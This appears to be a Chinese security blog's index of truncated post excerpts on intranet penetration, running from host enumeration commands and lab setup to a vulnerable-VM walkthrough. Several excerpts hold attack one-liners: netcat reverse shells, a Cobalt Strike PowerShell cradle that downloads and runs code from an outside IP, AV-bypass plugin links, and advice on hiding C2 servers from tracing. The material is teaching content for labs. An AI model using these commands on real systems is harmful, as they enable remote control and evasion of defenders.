工作组信息收集用户信息12345678910111213141516171819#查看本机用户列表net user#获取本地管理员信息net localgroup administrators#查看当前在线用户quserquery userquery user || qwinsta#查当前用户在目标系统中的具体权限whoami /all#查看当前权限whoami && whoami /priv#查当前机器中所有的组名,了解不同组的职能,如,IT,HR,ADMIN,FILEnet localgroup
系统信息12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152535455565758596061#查询网络配置信息。进行IP地址段信息收集ipconfig /all#查询操作系统及软件信息systeminfo /fo listsysteminfo | findstr "主机名"systeminfo | findstr ...
系统下载
系统
角色
IP
Windows Server 2012 R2
域控
10.10.10.10
Windows Server 2008 R2
域成员
10.10.10.20
Windows 7
域成员
10.10.10.30
https://mp.weixin.qq.com/s?__biz=MzI5MTA1ODk5NQ==&mid=2247484151&idx=1&sn=f1e95bb472fbe2793a213a2e2d7f4ec3
Windows Server 2012 R2
镜像下载:ed2k://|file|cn_windows_server_2012_r2_vl_with_update_x64_dvd_6052729.iso|5545527296|BD499EBCABF406AB82293DD8A5803493|/
Windows Server 2008 R2
镜像下载:ed2k://|file|cn_windows_server_2008_r2_standard ...
什么是内网渗透在拿到webshell/meterpreter/beacon的时候,想办法获得系统信息拿到系统权限,进入到网络系统内部之 后收集内部网络的各种信息,获取内部网络有价值的人员、资产信息。
内网渗透的第一步,内网信息收集
内网外网简介内网外网概念内网
内网又称局域网(Local Area Network,LAN),是指在某一区域内由多台计算机以及网络设备构成的网络,比如校园网、政府网等,一般方圆几公里。
我们常说的内网,从字面意思上来讲是区别于外网的,也就是说内网一般是用于局域网内部的计算机之间的互相通信,如果需要访问Internet,需要借助外网。
外网
外网也被称为广域网(WAN),是连接不同地区局域网或城域网计算机通信的远程网。
所覆盖的范围从几十公里到几千公里,它能连接多个地区、城市和国家,或横跨几个洲并能提供远距离通信,形成国际性的远程网络。
广域网并不等同于互联网。
内网与外网区别
内网和外网的覆盖范围不一样,内网通常是一个学校、一个医院的网络,外网通常指Internet网;
内网一般是用于局域网内部的计算机之间的互相通信, ...
Linux文件描述符文件描述符简介文件描述符是一个非负整数,内核需要通过这个文件描述符才可以访问文件
文件描述符好比一本书的目录(索引),通过这个索引可以找到需要的内容在Linux系统中内核默认为每个进程创建三个标准的文件描述符:0(标准输入)、1(标准输出)、2(标准错误)
通过查看 /proc/PID/fd 目录下的文件,就可以查看每个进程拥有的所有文件描述符
例如:查看当前shell的文件描述符
1/proc/$$/fd
当打开文件时,系统内核会为特定的进程自动创建对应的文件描述符例子:
12345678#tail打开一个文件tail -f flag#获取tail进程PIDpidof tail#查看tail进程创建的文件描述符ll /proc/5539/fd
可以看到存在一个文件描述符 3 索引打开的 /root/Desktop/flag 文件
标准文件描述符
Linux系统将所有设备都当作文件来处理,而Linux用文件描述符来标识每个文件对象。当Linux启动的时候会默认打开三个文件描述符
文件描述符
缩写
描述
默认设备
0 ...
反弹Shell简介正向shell
正向shell:控制端主动发起连接请求去连接被控制端,中间网络链路不存在阻碍。
反向shell
反向shell(反弹shell):被控端主动发起连接请求去连接控制端。
通常被控端由于防火墙限制、权限不足、端口被占用等问题导致被控端不能正常接收发送过来的数据包。
NCNC正向Shell
被控端:nc -lvvp 6666 -e cmd.exe控制端:nc 192.168.247.131 6666原理:被控端将cmd.exe重定向到本地的6666端口,控制端主动连接被控端的6666端口,即可获得shell
被控端:
控制端:
NC反向Shell
控制端:nc -lvvp 7777被控端:nc -e cmd.exe 192.168.1.105 7777原理:被控端将cmd.exe重定向到控制端的7777端口,控制端只需要监听本地的7777端口,即可获得shell。
控制端:
被控端:
Mshta
Mshta.exe 是用于负责解释运行 HTA (HTML应用程序)文件的Windows OS实用程序。 可以运行JavaScript或VB ...
CS的Powershell加载器在cobaltstrike中,我们经常会使用powershell远程加载上线,下面来大概分析下其基本原理。
CS生成Powershell反弹shell
1powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://47.236.16.67:802/a'))"
获取远程加载代码
访问url链接即可获得如下代码
1$s=New-Object IO.MemoryStream(,[Convert]::FromBase64String("...base64加密字符串..."));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s,[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();
代码解释
先 base64 解码一段字符 ...
CobaltStrike扩展脚本扩展脚本简介扩展是 Cobaltstrike 一个极为重要的模块,它有效地丰富了 Cobaltstrike 的功能
选择菜单栏的 CobaltStrike > Script Manager(脚本管理器),点击 Load(加载),然后选择要使用的.cna扩展文件即可
常用扩展脚本插件后渗透插件-梼杌:https://gitee.com/yijingsec/taowu-cobalt-strike-en
免杀插件-bypassAV:https://gitee.com/yijingsec/BypassAV
上线linux主机-CrossC2:https://gitee.com/yijingsec/CrossC2
CS上线Linux主机CrossC2介绍项目地址:https://gitee.com/yijingsec/CrossC2项目文档:https://gitee.com/yijingsec/CrossC2/blob/cs4.1/README_zh_full.md
Cross C2 项目是一个可以生成 Linux/Mac OS 的 Cobalt ...
Powershell基础Powershell简介
什么是 Windows PowerShell
Windows PowerShell 是 Microsoft 创建的基于任务的自动化命令行Shell和相关脚本语言,基于 .NET 框架。
是Microsoft的新Shell,它将旧的命令提示符(CMD)功能与具有内置系统管理功能的新脚本指令集结合在一起。
用于控制和自动化管理Windows操作系统和运行在操作系统上的应用。
被广泛用于渗透测试等方面,在不需要写入磁盘的情况下执行命令,也可以逃避 Anti-Virus 检测。
Windows PowerShell 中的命令称为 cmdlet ,发音为“ command-lets ”,其中每个 cmdlet 代表特定的功能或基于任务的脚本。
Powershell 默认安装在Win7及以后的系统上。
操作系统信任,提供Windows操作系统的几乎一切访问权限
Windows PowerShell 集成脚本环境(ISE)
为什么使用 Windows PowerShell
它既是脚本语言,又是命令行Shell。它可以与不同 ...
域名上线隐藏IP为什么要隐藏IP在使用MSF或者CS获得目标机Sessions或者Beacon时,如果直接使用自己的VPS作为MSF或CS的服务器时,容易被溯源到攻击者所在VPS主机IP。
域名上线原理当我们访问域名时会经过域名解析,域名解析就是将域名转换到IP地址的过程,我们通过域名访问服务器,实际上是访问的目标服务器IP地址
A记录: 将域名指向一个IPv4地址(例如:100.100.100.100),需要增加A记录
CNAME记录: 如果将域名指向一个域名,实现与被指向域名相同的访问效果,需要增加CNAME记录。这个域名一般是主机服务商提供的一个域名
MX记录: 建立电子邮箱服务,将指向邮件服务器地址,需要设置MX记录。建立邮箱时,一般会根据邮箱服务商提供的MX记录填写此记录
NS记录: 域名解析服务器记录,如果要将子域名指定某个域名服务器来解析,需要设置NS记录TXT记录: 可任意填写,可为空。一般做一些验证记录时会使用此项,如:做SPF(反垃圾邮件)记录
AAAA记录: 将主机名(或域名)指向一个IPv6地址(例如:ff03:0:0:0:0:0:0:c1),需要添加AAAA ...
0x00 准备工作在vulnhub官网下载DC:2靶机https://www.vulnhub.com/entry/dc-2,311/
导入到vmware
注意:保障靶机和渗透主机在同一网段即可,这里我们网络模式选择 NAT 模式,即共享IP地址
打开kali准备进行渗透(ip:192.168.247.135)
根据提示 需要把靶机的IP和 域名绑定 修改hosts文件
0x01 信息收集跟上题一样(arp-scan,masscan,nmap)
123451、arp-scan -l2、masscan --rate=10000 -p1-65535 192.168.247.1373、nmap -sV -p 80,7744 -A -oX dc2.xml 192.168.247.137
1nmap -sS 192.168.247.135/24
得知
渗透机kali IP :192.168.247.135靶机IP :192.168.247.137
对靶机进行深度扫描
或者
发现 ip,直接 nmap 一顿梭:nmap -A -p- -T4 192.168.247.137
接着他的 ...